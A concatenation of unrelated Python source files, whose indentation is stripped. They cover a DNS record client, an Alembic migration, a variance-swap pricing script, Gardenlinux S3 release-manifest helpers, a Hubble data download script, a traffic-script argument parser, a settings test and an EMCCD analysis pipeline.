# {PRINT} error|success info
for msg in parse.record_msg(self.response, all=True):
print_info(msg)
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
return data
def add_record(self, domain, name='', target='', type='', ttl=''):
"""{Request} and {Add} Record Data"""
record_list = [{
'name': name.upper(),
'type': type.upper() if type else 'A',
'ttl': ttl if ttl else '3600',
'target': target if target else self.pub_ip
}]
return self.__request_record(domain, 'add', record_list)
def modify_record(self, domain, name='', target='', ttl=''):
"""{Request} and {Modify} Record Data"""
record_list = []
for item in self.locally_records(domain):
modify = True if item['name'] == name.upper() else False
record_list.append({
'name': item['name'],
'type': item['type'],
'ttl': ttl if modify and ttl else item['ttl'],
'target': (target or self.pub_ip) if modify else item['target']})
return self.__request_record(domain, 'modify', record_list)
def set_record(self, domain, name, *args, **kwargs):
"""{Request} and {Add|Modify} Record Data"""
return self.modify_record(domain, name, *args, **kwargs) \
if [i for i in self.locally_records(domain) if i['name'] == name.upper()] \
else self.add_record(domain, name, *args, **kwargs)
def set_record_list(self, domain, record_list):
"""{Request} and {Modify} a list Record Data"""
add_record_list = []
modify_record_list = []
total_record_list = [add_record_list, modify_record_list]
for record in record_list[:]:
name = record.get('name')
if name is None: continue
name = name.upper()
_record = {
'name': name,
'type': record.get('type', 'A').upper(),
'ttl': record.get('ttl', '3600'),
'target': record['target'] if record.get('target') else self.pub_ip
}
if not name in [i['name'] for i in self.locally_records(domain)]:
add_record_list.append(_record)
modify_record_list.append(_record)
for i in range(len(total_record_list)):
record_list = total_record_list[i]
record_list = ([] if add_record_list == total_record_list[i] else record_list) if i else record_list
if record_list: self.__request_record(domain, 'modify' if i else 'add', record_list)
def del_record(self, domain, name, target=None, type=None, ttl=None):
"""{Request} and {Delete} Domain Record Data"""
target = match_ip_address(target) if target else None
type = type.upper() if type else None
name = name.upper()
records_data = self.locally_records(domain)
record = {}
for item in records_data:
if item['name'] == name and item['target'] == target:
record = item
break
elif item['name'] == name and item['type'] == type:
record = item
break
elif item['name'] == name and item['ttl'] == ttl:
record = item
break
elif item['name'] == name:
record = item
# if not record:
# print_warn(f'{name.lower()}.{domain} NOT FOUND')
# exit()
# {Request}
if record:
self.get(url.PREFIX + record['delete'])
else:
print_info(f'{name.lower()}.{domain} NOT FOUND')
# print error|success info
print_info(parse.record_msg(self.response))
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
return data
def clear_record(self, domain):
"""{Request} and {Clear} All Domain Record Data (USE CAUTION!!!)"""
records_data = self.locally_records(domain)
for item in records_data:
# {Request}
self.get(url.PREFIX + item['delete'])
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
if self.locally_records(domain):
print_info('Not cleared successfully')
else:
print_info('All cleared successfully')
return data
|
# Copyright 2010-2011, Sikuli.org
# Released under the MIT License.
from math import sqrt
def byDistanceTo(m):
return lambda a,b: sqrt((a.x-m.x)**2+(a.y-m.y)**2) - sqrt((b.x-m.x)**2+(b.y-m.y)**2)
def byX(m):
return m.x
def byY(m):
return m.y
|
"""empty message
Revision ID: e807ed32cfe8
Revises: 4e795598fe95
Create Date: 2021-10-17 21:11:10.023516
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'e807ed32cfe8'
down_revision = '4e795598fe95'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('notify',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('title', sa.String(length=20), nullable=False),
sa.Column('content', sa.TEXT(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.drop_table('notice')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('notice',
sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),
sa.Column('title', mysql.VARCHAR(length=20), nullable=False),
sa.Column('content', mysql.TEXT(), nullable=True),
sa.PrimaryKeyConstraint('id'),
mysql_collate='utf8mb4_0900_ai_ci',
mysql_default_charset='utf8mb4',
mysql_engine='InnoDB'
)
op.drop_table('notify')
# ### end Alembic commands ###
|
# Generated with SMOP 0.41-beta
try:
from smop.libsmop import *
except ImportError:
raise ImportError('File compiled with `smop3`, please install `smop3` to run it.') from None
# Script_DV_Swap_Options.m
##################################################################
### Discrete Variance Swap / Option Pricer
##################################################################
# Descritpion: Script to Price Discrete Variance Swap / Options under stochastic volatility models (with jumps)
# Author: Justin Kirkby
# References: (1) A General Framework for discretely sampled realized
# variance derivatives in stocahstic volatility models with
# jumps, EJOR, 2017
# (2) Efficient Option Pricing By Frame Duality with The Fast
# Fourier Transform, SIAM J. Financial Math., 2015
##################################################################
folder,name,ext=fileparts(which(mfilename('fullpath')),nargout=3)
# Script_DV_Swap_Options.m:13
cd(folder)
addpath('../Helper_Functions')
addpath('./Analytical_Swaps')
###----------------------------
# Set Model/Contract Params
###----------------------------
contract=1
# Script_DV_Swap_Options.m:23
K=0.0
# Script_DV_Swap_Options.m:24
r=0.01
# Script_DV_Swap_Options.m:25
q=0
# Script_DV_Swap_Options.m:26
T=0.5
# Script_DV_Swap_Options.m:27
M=20
# Script_DV_Swap_Options.m:28
###----------------------------
# Set Numerical/Approximation Params
###----------------------------
numeric_param=cellarray([])
# Script_DV_Swap_Options.m:33
numeric_param.N = copy(2 ** 9)
# Script_DV_Swap_Options.m:34
numeric_param.m_0 = copy(40)
# Script_DV_Swap_Options.m:35
numeric_param.gamma = copy(5.5)
# Script_DV_Swap_Options.m:36
numeric_param.gridMethod = copy(4)
# Script_DV_Swap_Options.m:37
numeric_param.gridMultParam = copy(0.8)
# Script_DV_Swap_Options.m:38
L1=14
# Script_DV_Swap_Options.m:39
###========================
#### Select Stochastic Volatility Model
###========================
model=1
# Script_DV_Swap_Options.m:44
# 2 = Stein-Stein
# 3 = 3/2 Model
# 4 = 4/2 Model
# 5 = Hull White (output compares with analytical)
# 6 = Scott
# 7 = Alpha-Hypergeometric
###========================
#### Select Jump Model
###========================
jumpModel=0
# Script_DV_Swap_Options.m:55
# 1 = Normal Jumps
# 2 = Double Exponential Jumps
################################
# Jump Model Parameters
################################
jumpParams=cellarray([])
# Script_DV_Swap_Options.m:62
if jumpModel == 0:
jumpParams.Nothing = copy(0)
# Script_DV_Swap_Options.m:65
psi_J=lambda u=None: dot(0,concat([u > 0]))
# Script_DV_Swap_Options.m:66
c2Jump=0
# Script_DV_Swap_Options.m:68
c4Jump=0
# Script_DV_Swap_Options.m:69
else:
if jumpModel == 1:
lambda_=1
# Script_DV_Swap_Options.m:72
muJ=- 0.12
# Script_DV_Swap_Options.m:72
sigJ=0.15
# Script_DV_Swap_Options.m:72
jumpParams.kappa = copy(exp(muJ + dot(0.5,sigJ ** 2)) - 1)
# Script_DV_Swap_Options.m:74
jumpParams.lambda = copy(lambda_)
# Script_DV_Swap_Options.m:75
jumpParams.muJ = copy(muJ)
# Script_DV_Swap_Options.m:75
jumpParams.sigJ = copy(sigJ)
# Script_DV_Swap_Options.m:75
psi_J=lambda u=None: dot(lambda_,(exp(dot(dot(1j,u),muJ) - dot(dot(0.5,sigJ ** 2),u ** 2)) - 1))
# Script_DV_Swap_Options.m:76
c2Jump=dot(lambda_,(muJ ** 2 + sigJ ** 2))
# Script_DV_Swap_Options.m:78
c4Jump=dot(lambda_,(muJ ** 4 + dot(dot(6,sigJ ** 2),muJ ** 2) + dot(dot(3,sigJ ** 4),lambda_)))
# Script_DV_Swap_Options.m:79
else:
if jumpModel == 2:
lambda_=1
# Script_DV_Swap_Options.m:82
p_up=0.5
# Script_DV_Swap_Options.m:83
eta1=25
# Script_DV_Swap_Options.m:84
eta2=30
# Script_DV_Swap_Options.m:85
kappa=dot(p_up,eta1) / (eta1 - 1) + dot((1 - p_up),eta2) / (eta2 + 1) - 1
# Script_DV_Swap_Options.m:87
jumpParams.lambda = copy(lambda_)
# Script_DV_Swap_Options.m:88
jumpParams.kappa = copy(kappa)
# Script_DV_Swap_Options.m:88
jumpParams.eta1 = copy(eta1)
# Script_DV_Swap_Options.m:88
jumpParams.eta2 = copy(eta2)
# Script_DV_Swap_Options.m:88
jumpParams.p_up = copy(p_up)
# Script_DV_Swap_Options.m:88
psi_J=lambda u=None: dot(lambda_,(dot(p_up,eta1) / (eta1 - dot(1j,u)) + dot((1 - p_up),eta2) / (eta2 + dot(1j,u)) - 1))
# Script_DV_Swap_Options.m:89
c2Jump=dot(dot(2,lambda_),p_up) / eta1 ** 2 + dot(dot(2,lambda_),(1 - p_up)) / eta2 ** 2
# Script_DV_Swap_Options.m:91
c4Jump=dot(dot(24,lambda_),(p_up / eta1 ** 4 + (1 - p_up) / eta2 ** 4))
# Script_DV_Swap_Options.m:92
################################################
#### Set the Stochastic Volatility Model Component
################################################
if model == 1:
###==============================
### HESTON MODEL Parameters
###==============================
modparam.eta = copy(3.99)
# Script_DV_Swap_Options.m:103
modparam.theta = copy(0.014)
# Script_DV_Swap_Options.m:104
modparam.rho = copy(- 0.79)
# Script_DV_Swap_Options.m:105
modparam.Sigmav = copy(0.27)
# Script_DV_Swap_Options.m:106
modparam.v0 = copy((0.0994) ** 2)
# Script_DV_Swap_Options.m:107
else:
if model == 2:
###=============================================================
### STEIN-STEIN MODEL Parameters
###=============================================================
modparam.eta = copy(2)
# Script_DV_Swap_Options.m:113
modparam.theta = copy(0.18)
# Script_DV_Swap_Options.m:114
modparam.Sigmav = copy(0.18)
# Script_DV_Swap_Options.m:115
modparam.v0 = copy(0.22)
# Script_DV_Swap_Options.m:116
modparam.rho = copy(- 0.5)
# Script_DV_Swap_Options.m:117
else:
if model == 3:
###=============================================================
### 3/2 MODEL Parameters
###=============================================================
modparam.Sigmav = copy(0.1)
# Script_DV_Swap_Options.m:123
modparam.eta = copy(3)
# Script_DV_Swap_Options.m:124
modparam.rho = copy(- 0.7)
# Script_DV_Swap_Options.m:125
modparam.theta = copy(0.04)
# Script_DV_Swap_Options.m:126
modparam.v0 = copy(0.04)
# Script_DV_Swap_Options.m:127
else:
if model == 4:
###=============================================================
### 4/2 MODEL Parameters
###=============================================================
modparam.eta = copy(3)
# Script_DV_Swap_Options.m:133
modparam.theta = copy(0.04)
# Script_DV_Swap_Options.m:134
modparam.rho = copy(- 0.7)
# Script_DV_Swap_Options.m:135
modparam.Sigmav = copy(0.25)
# Script_DV_Swap_Options.m:136
modparam.v0 = copy(0.04)
# Script_DV_Swap_Options.m:137
modparam.aa = copy(0.5)
# Script_DV_Swap_Options.m:138
modparam.bb = copy(dot(0.5,modparam.v0))
# Script_DV_Swap_Options.m:139
else:
if model == 5:
###=============================================================
### HULL-WHITE MODEL Parameters
###=============================================================
modparam.av = copy(0.05)
# Script_DV_Swap_Options.m:145
modparam.rho = copy(- 0.6)
# Script_DV_Swap_Options.m:146
modparam.Sigmav = copy(0.6)
# Script_DV_Swap_Options.m:147
modparam.v0 = copy(0.03)
# Script_DV_Swap_Options.m:148
else:
if model == 6:
###=============================================================
### SCOTT MODEL Parameters
###=============================================================
modparam.eta = copy(2)
# Script_DV_Swap_Options.m:154
modparam.theta = copy(log(0.16))
# Script_DV_Swap_Options.m:155
modparam.Sigmav = copy(0.2)
# Script_DV_Swap_Options.m:156
modparam.v0 = copy(log(0.18))
# Script_DV_Swap_Options.m:157
modparam.rho = copy(- 0.9)
# Script_DV_Swap_Options.m:158
else:
if model == 7:
###=============================================================
### ALPHA-HYPERGEOMETRIC MODEL Parameters
###=============================================================
modparam.rho = copy(- 0.9)
# Script_DV_Swap_Options.m:164
modparam.Sigmav = copy(0.2)
# Script_DV_Swap_Options.m:165
modparam.v0 = copy(log(0.17))
# Script_DV_Swap_Options.m:166
modparam.eta = copy(0.05)
# Script_DV_Swap_Options.m:167
modparam.theta = copy(0.2)
# Script_DV_Swap_Options.m:168
modparam.av = copy(0.03)
# Script_DV_Swap_Options.m:169
##############################################################
# PRICE CONTACT
##############################################################
#density projection grid on [-alpha,alpha]
numeric_param.alph = copy(GetAlph_DisreteVariance(c2Jump,c4Jump,model,modparam,T,L1))
# Script_DV_Swap_Options.m:177
PROJ_Price=PROJ_DiscreteVariance_StochVol(numeric_param,M,r,T,K,psi_J,model,modparam,contract)
# Script_DV_Swap_Options.m:179
fprintf('PROJ Price: %.8f \n',PROJ_Price)
### In the special cases where analytic prices are known, also print the error
if model == 1 and jumpModel == 0 and contract == 1:
ref,KcH=hestonfairstrike(r,modparam.v0,modparam.theta,modparam.eta,modparam.Sigmav,T,modparam.rho,M,nargout=2)
# Script_DV_Swap_Options.m:184
fprintf('Analytical Price: %.8f \n',ref)
fprintf('Error: %.3e \n',PROJ_Price - ref)
else:
if model == 5 and jumpModel == 0 and contract == 1:
ref,KcH=hullwhitefairstrike(r,modparam.v0,modparam.Sigmav,modparam.av,T,modparam.rho,M,nargout=2)
# Script_DV_Swap_Options.m:189
Error1=PROJ_Price - ref
# Script_DV_Swap_Options.m:190
fprintf('Analytical Price: %.8f \n',ref)
fprintf('Error: %.3e \n',PROJ_Price - ref)
|
import concurrent.futures
import dataclasses
import enum
import faulthandler
import functools
import io
import logging
import os
import pprint
import typing
import botocore.client
import botocore.exceptions
import dacite
import yaml
import glci.model
import paths
GardenlinuxFlavourSet = glci.model.GardenlinuxFlavourSet
GardenlinuxFlavour = glci.model.GardenlinuxFlavour
GardenlinuxFlavourCombination = glci.model.GardenlinuxFlavourCombination
Architecture = glci.model.Architecture
CicdCfg = glci.model.CicdCfg
def configure_logging():
faulthandler.enable()
cfg = {
'version': 1,
'formatters': {
'default': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'default',
'level': logging.INFO,
'stream': 'ext://sys.stdout',
},
},
'root': {
'level': logging.DEBUG,
'handlers': ['console',],
},
'loggers': {
'googleapiclient.discovery_cache': {
'level': logging.ERROR,
},
},
}
logging.config.dictConfig(cfg)
def cicd_cfg(
cfg_name: str='default',
cfg_file=paths.cicd_cfg_path,
) -> CicdCfg:
with open(cfg_file) as f:
parsed = yaml.safe_load(f)
for raw in parsed['cicd_cfgs']:
cfg = dacite.from_dict(
data_class=CicdCfg,
data=raw,
)
if cfg.name == cfg_name:
return cfg
else:
raise ValueError(f'not found: {cfg_name=}')
def flavour_sets(
build_yaml: str=paths.flavour_cfg_path,
) -> typing.List[GardenlinuxFlavourSet]:
with open(build_yaml) as f:
parsed = yaml.safe_load(f)
flavour_sets = [
dacite.from_dict(
data_class=GardenlinuxFlavourSet,
data=flavour_set,
config=dacite.Config(
cast=[Architecture, typing.Tuple]
)
) for flavour_set in parsed['flavour_sets']
]
return flavour_sets
def flavour_set(
flavour_set_name: str,
build_yaml: str=paths.flavour_cfg_path,
):
for fs in flavour_sets(build_yaml=build_yaml):
if fs.name == flavour_set_name:
return fs
else:
raise RuntimeError(f'not found: {flavour_set=}')
def release_manifest(
s3_client: 'botocore.client.S3',
bucket_name: str,
key: str,
absent_ok: bool=False,
) -> glci.model.OnlineReleaseManifest:
'''
retrieves and deserialises a gardenlinux release manifest from the specified s3 object
(expects a YAML or JSON document)
'''
buf = io.BytesIO()
try:
s3_client.download_fileobj(
Bucket=bucket_name,
Key=key,
Fileobj=buf,
)
except botocore.exceptions.ClientError as e:
if absent_ok and str(e.response['Error']['Code']) == '404':
return None
raise e
buf.seek(0)
parsed = yaml.safe_load(buf)
# patch-in transient attrs
parsed['s3_key'] = key
parsed['s3_bucket'] = bucket_name
manifest = dacite.from_dict(
data_class=glci.model.OnlineReleaseManifest,
data=parsed,
config=dacite.Config(
cast=[
glci.model.Architecture,
typing.Tuple
],
),
)
return manifest
def release_manifest_set(
s3_client: 'botocore.client.S3',
bucket_name: str,
manifest_key: str,
absent_ok: bool=False,
) -> glci.model.OnlineReleaseManifest:
buf = io.BytesIO()
try:
s3_client.download_fileobj(
Bucket=bucket_name,
Key=manifest_key,
Fileobj=buf,
)
except botocore.exceptions.ClientError as e:
if absent_ok and str(e.response['Error']['Code']) == '404':
return None
raise e
buf.seek(0)
parsed = yaml.safe_load(buf)
print(manifest_key)
manifest = dacite.from_dict(
data_class=glci.model.ReleaseManifestSet,
data=parsed,
config=dacite.Config(
cast=[
glci.model.Architecture,
typing.Tuple
],
),
)
return manifest
def _json_serialisable_manifest(manifest: glci.model.ReleaseManifest):
# workaround: need to convert enums to str
patch_args = {
attr: val.value for attr, val in manifest.__dict__.items()
if isinstance(val, enum.Enum)
}
manifest = dataclasses.replace(manifest, **patch_args)
return manifest
def upload_release_manifest(
s3_client: 'botocore.client.S3',
bucket_name: str,
key: str,
manifest: glci.model.ReleaseManifest,
):
manifest = _json_serialisable_manifest(manifest=manifest)
manifest_bytes = yaml.safe_dump(dataclasses.asdict(manifest)).encode('utf-8')
manifest_fobj = io.BytesIO(initial_bytes=manifest_bytes)
return s3_client.upload_fileobj(
Fileobj=manifest_fobj,
Bucket=bucket_name,
Key=key,
ExtraArgs={
'ContentType': 'text/yaml',
'ContentEncoding': 'utf-8',
},
)
def upload_release_manifest_set(
s3_client: 'botocore.client.S3',
bucket_name: str,
key: str,
manifest_set: glci.model.ReleaseManifestSet,
):
manifests = [_json_serialisable_manifest(m) for m in manifest_set.manifests]
manifest_set = dataclasses.replace(manifest_set, manifests=manifests)
manifest_set_bytes = yaml.safe_dump(dataclasses.asdict(manifest_set)).encode('utf-8')
manifest_set_fobj = io.BytesIO(initial_bytes=manifest_set_bytes)
return s3_client.upload_fileobj(
Fileobj=manifest_set_fobj,
Bucket=bucket_name,
Key=key,
ExtraArgs={
'ContentType': 'text/yaml',
'ContentEncoding': 'utf-8',
},
)
def enumerate_releases(
s3_client: 'botocore.client.S3',
bucket_name: str,
prefix: str=glci.model.ReleaseManifest.manifest_key_prefix,
) -> typing.Generator[glci.model.ReleaseManifest, None, None]:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=64)
_release_manifest = functools.partial(
release_manifest,
s3_client=s3_client,
bucket_name=bucket_name,
)
continuation_token = None
while True:
ctoken_args = {'ContinuationToken': continuation_token} \
if continuation_token \
else {}
res = s3_client.list_objects_v2(
Bucket=bucket_name,
Prefix=prefix,
**ctoken_args,
)
if (key_count := res['KeyCount']) == 0:
return
is_truncated = bool(res['IsTruncated'])
continuation_token = res.get('NextContinuationToken')
print(f'found {key_count} release manifests')
def wrap_release_manifest(key):
return _release_manifest(key=key)
keys = [obj_dict['Key'] for obj_dict in res['Contents']]
yield from executor.map(wrap_release_manifest, keys)
if not is_truncated:
return
def find_release(
s3_client: 'botocore.client.S3',
bucket_name: str,
release_identifier: glci.model.ReleaseIdentifier,
prefix: str=glci.model.ReleaseManifest.manifest_key_prefix,
):
normalised = glci.model.normalised_release_identifier
release_manifest_key = release_identifier.canonical_release_manifest_key()
manifest = release_manifest(
s3_client=s3_client,
bucket_name=bucket_name,
key=release_manifest_key,
absent_ok=True,
)
if not manifest:
return None
if (found_ri := normalised(manifest.release_identifier())) \
== (searched_ri := normalised(release_identifier)):
return manifest
else:
# warn about not matching expected contents from canonical name
print(f'WARNING: {release_manifest_key=} contained unexpected contents:')
print('this is the release-identifier we searched for:')
pprint.pprint(dataclasses.asdict(searched_ri))
print('this is the release-identifier we found:')
pprint.pprint(dataclasses.asdict(found_ri))
return None
def find_releases(
s3_client: 'botocore.client.S3',
bucket_name: str,
flavour_set: glci.model.GardenlinuxFlavourSet,
build_committish: str,
version: str,
gardenlinux_epoch: int,
prefix: str=glci.model.ReleaseManifest.manifest_key_prefix,
):
flavours = set(flavour_set.flavours())
for flavour in flavours:
release_identifier = glci.model.ReleaseIdentifier(
build_committish=build_committish,
version=version,
gardenlinux_epoch=gardenlinux_epoch,
architecture=flavour.architecture,
platform=flavour.platform,
modifiers=flavour.modifiers,
)
existing_release = find_release(
s3_client=s3_client,
bucket_name=bucket_name,
release_identifier=release_identifier,
prefix=prefix,
)
if existing_release:
yield existing_release
def release_set_manifest_name(
build_committish: str,
gardenlinux_epoch: int,
version: str,
flavourset_name: str,
build_type: glci.model.BuildType,
):
BT = glci.model.BuildType
if build_type in (BT.SNAPSHOT, BT.DAILY):
return f'{gardenlinux_epoch}-{build_committish[:6]}-{flavourset_name}'
elif build_type is BT.RELEASE:
return f'{version}-{flavourset_name}'
def enumerate_release_sets(
s3_client: 'botocore.client.S3',
bucket_name: str,
prefix: str=glci.model.ReleaseManifestSet.release_manifest_set_prefix,
) -> typing.Generator[glci.model.ReleaseManifest, None, None]:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=64)
_release_manifest_set = functools.partial(
release_manifest_set,
s3_client=s3_client,
bucket_name=bucket_name,
)
continuation_token = None
while True:
ctoken_args = {'ContinuationToken': continuation_token} \
if continuation_token \
else {}
res = s3_client.list_objects_v2(
Bucket=bucket_name,
Prefix=prefix,
**ctoken_args,
)
if (key_count := res['KeyCount']) == 0:
return
is_truncated = bool(res['IsTruncated'])
continuation_token = res.get('NextContinuationToken')
print(f'found {key_count} release manifests')
keys = [
key for obj_dict in res['Contents']
# filter out directories
if s3_client.head_object(
Bucket=bucket_name,
Key=(key := obj_dict['Key']),
)['ContentType'] != 'application/x-directory'
]
def wrap_release_manifest_set(key):
return _release_manifest_set(manifest_key=key)
yield from executor.map(wrap_release_manifest_set, keys)
if not is_truncated:
return
def find_release_set(
s3_client: 'botocore.client.S3',
bucket_name: str,
flavourset_name: str,
build_committish: str,
gardenlinux_epoch: int,
version: str,
build_type: glci.model.BuildType,
prefix: str=glci.model.ReleaseManifestSet.release_manifest_set_prefix,
absent_ok=False,
) -> glci.model.ReleaseManifestSet:
build_type = glci.model.BuildType(build_type)
manifest_key = os.path.join(
prefix,
build_type.value,
release_set_manifest_name(
build_committish=build_committish,
gardenlinux_epoch=gardenlinux_epoch,
version=version,
flavourset_name=flavourset_name,
build_type=build_type,
),
)
print(manifest_key)
manifest = release_manifest_set(
s3_client=s3_client,
bucket_name=bucket_name,
manifest_key=manifest_key,
absent_ok=absent_ok,
)
return manifest
@functools.lru_cache
def preconfigured(
func: callable,
cicd_cfg: glci.model.CicdCfg=cicd_cfg(),
):
# depends on `gardener-cicd-base`
try:
import ccc.aws
except ModuleNotFoundError:
raise RuntimeError('missing dependency: install gardener-cicd-base')
s3_session = ccc.aws.session(cicd_cfg.build.aws_cfg_name)
s3_client = s3_session.client('s3')
return functools.partial(
func,
s3_client=s3_client,
bucket_name=cicd_cfg.build.s3_bucket_name,
)
class EnumValueYamlDumper(yaml.SafeDumper):
'''
a yaml.SafeDumper that will dump enum objects using their values
'''
def represent_data(self, data):
if isinstance(data, enum.Enum):
return self.represent_data(data.value)
return super().represent_data(data)
|
#!/usr/bin/env python3
from astroquery.mast import Observations
import IPython
import boto3
from s3_query import find_product_in_s3
Observations.enable_s3_hst_dataset()
obs = Observations.query_criteria(
dataproduct_type=['image'],
project='HST',
instrument_name='ACS/WFC',
filters='F555W',
calib_level=3,
)
print("Observations: ", len(obs))
products = Observations.get_product_list(obs)
print("Products: ", len(products))
filtered_products = Observations.filter_products(
products,
productType='SCIENCE',
extension='fits',
description='DADS FLT file - Calibrated exposure ACS/WFC3/STIS/COS',
)
print("Filtered products: ", len(filtered_products))
print()
s3 = boto3.resource('s3')
for prod in filtered_products:
(key, head) = find_product_in_s3(prod)
filename = key.split('/').pop()
print("Downloading ", filename)
s3.Bucket("stpubdata").download_file(
key, filename,
{'RequestPayer':'requester'}
)
|
# Copyright (c) 2020 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Traffic scripts argument parser library."""
import argparse
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u"--tx_if", help=u"interface that sends traffic")
parser.add_argument(u"--rx_if", help=u"interface that receives traffic")
if more_args is not None:
for arg in more_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name, nargs=u"?", default=u"")
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
|
from cc import LuaException, import_file, fs, settings
_lib = import_file('_lib.py', __file__)
step, assert_raises = _lib.step, _lib.assert_raises
assert _lib.get_class_table(settings) == _lib.get_object_table('settings')
step('Settings will be cleared')
assert settings.clear() is None
# names are not empty, there are system settings
assert isinstance(settings.getNames(), list)
assert settings.define('test.a') is None
assert settings.define('test.b', description='b') is None
assert settings.define('test.c', type='string') is None
assert settings.define('test.d', default=42) is None
assert settings.getDetails('test.a') == {
'changed': False,
}
assert settings.getDetails('test.b') == {
'changed': False,
'description': 'b',
}
assert settings.getDetails('test.c') == {
'changed': False,
'type': 'string',
}
assert settings.getDetails('test.d') == {
'changed': False,
'default': 42,
'value': 42,
}
# redefining
assert settings.define('test.a', type='number', default=11) is None
assert settings.getDetails('test.a') == {
'changed': False,
'type': 'number',
'default': 11,
'value': 11,
}
assert settings.get('test.a') == 11
assert settings.set('test.a', 12) is None
assert settings.get('test.a') == 12
with assert_raises(LuaException):
settings.set('test.a', b'text')
assert settings.get('test.a') == 12
assert settings.unset('test.a') is None
assert settings.get('test.a') == 11
assert settings.set('test.c', b'hello') is None
assert {'test.a', 'test.b', 'test.c', 'test.d'}.issubset(set(settings.getNames()))
assert settings.undefine('test.a') is None
assert settings.undefine('test.b') is None
assert settings.undefine('test.c') is None
assert settings.undefine('test.d') is None
assert 'test.c' in settings.getNames()
assert settings.get('test.c') == b'hello'
assert settings.getDetails('test.c') == {
'changed': True,
'value': b'hello',
}
assert settings.unset('test.c') is None
assert settings.get('test.c') is None
assert settings.getDetails('test.c') == {
'changed': False,
}
assert {'test.a', 'test.b', 'test.c', 'test.d'} & set(settings.getNames()) == set()
assert settings.set('test.e', [9, b'text', False]) is None
assert settings.get('test.e') == {1: 9, 2: b'text', 3: False}
assert settings.clear() is None
assert settings.get('test.e') is None
fs.delete('.settings')
assert settings.load() is False
assert settings.save() is True
assert settings.load() is True
fs.delete('.settings')
assert settings.set('key', 84) is None
assert settings.save('sfile') is True
assert settings.load('sfile') is True
fs.delete('sfile')
print('Test finished successfully')
|
"""
Code for performing data analysis for State Preparation A tests that were performed
using the EMCCD camera in late 2021.
"""
from pathlib import Path
from typing import Union
import lmfit
import matplotlib.pyplot as plt
import numpy as np
from data_analysis import analyzers
from data_analysis import background_subtractors as BG_subtract
from data_analysis import (
bootstrapping,
cutters,
plotters,
preprocessors,
retrievers,
signal_calculators,
)
def analyze_SPA_dataset(
filepath: Union[Path, str],
run_name: Union[str, int],
background_run_name: Union[str, int],
scan_param_name: str,
scan_param_new_name: str,
switch_name: str = None,
n_bs: int = 6,
):
"""
Analyzes an SPA dataset
"""
##### Retrieving data from file #####
# Initialize data retriever
SPA_retriever = retrievers.SPARetriever()
# Print datasets in data
# SPA_retriever.print_run_names(filepath)
if type(run_name) == int:
run_name = SPA_retriever.get_run_names(filepath)[run_name]
# Retrieve data
df = SPA_retriever.retrieve_data(
filepath,
run_name,
scan_param=scan_param_name,
scan_param_new_name=scan_param_new_name,
)
##### Processing data #####
# Define preprocessors
processors = [
preprocessors.NormalizedAbsorption(),
preprocessors.IntegratedAbsorption(),
preprocessors.AbsorptionBigEnough(),
preprocessors.YAGFired(),
preprocessors.AbsorptionON(),
preprocessors.RotCoolON(),
preprocessors.RCShutterOpen(),
preprocessors.CamDAQTimeDiff(),
preprocessors.MicrowavesON(),
]
# Define plotters that will be run after the preprocessing
plotters_list = [plotters.PreProcessorPlotter()]
# Define the data processing pipeline
processor_pipeline = preprocessors.ProcessorPipeline(
processors, plotters=plotters_list
)
# Pre-process the data
processor_pipeline.process_data(df, plot=False)
##### Cutting data #####
# Define cutters
cutters_list = [
cutters.YAGFiredCutter(),
cutters.AbsorptionONCutter(),
cutters.AbsBigEnoughCutter(),
cutters.TimingCutter(),
]
# Define cutter pipeline
cutter_pipeline = cutters.CutterPipeline(cutters_list)
# Apply cuts
cutter_pipeline.apply_cuts(df, print_result=True)
##### Analyze preprocessed data #####
# Define a background subtractor
df_background = SPA_retriever.retrieve_data(filepath, background_run_name)
background_subtractor = BG_subtract.AcquiredBackgroundSubtractor(df_background)
# Define a signal size calculator
init_params = lmfit.Parameters()
init_params.add("A", value=10, min=0)
init_params.add("center_x", value=200, min=0, max=512) # , vary = False)
init_params.add("center_y", value=250, min=0, max=512) # , vary = False)
init_params.add("phi", value=0, min=0, max=np.pi / 4)
init_params.add("sigma_x", value=16, min=10, max=100)
init_params.add("sigma_y", value=30, min=10, max=100)
init_params.add("C", value=0)
signal_size_calculator = signal_calculators.SignalFromGaussianFit( # plotter = GaussianFitPlotter(),
init_params=init_params, ROI=np.s_[150:450, 100:300]
)
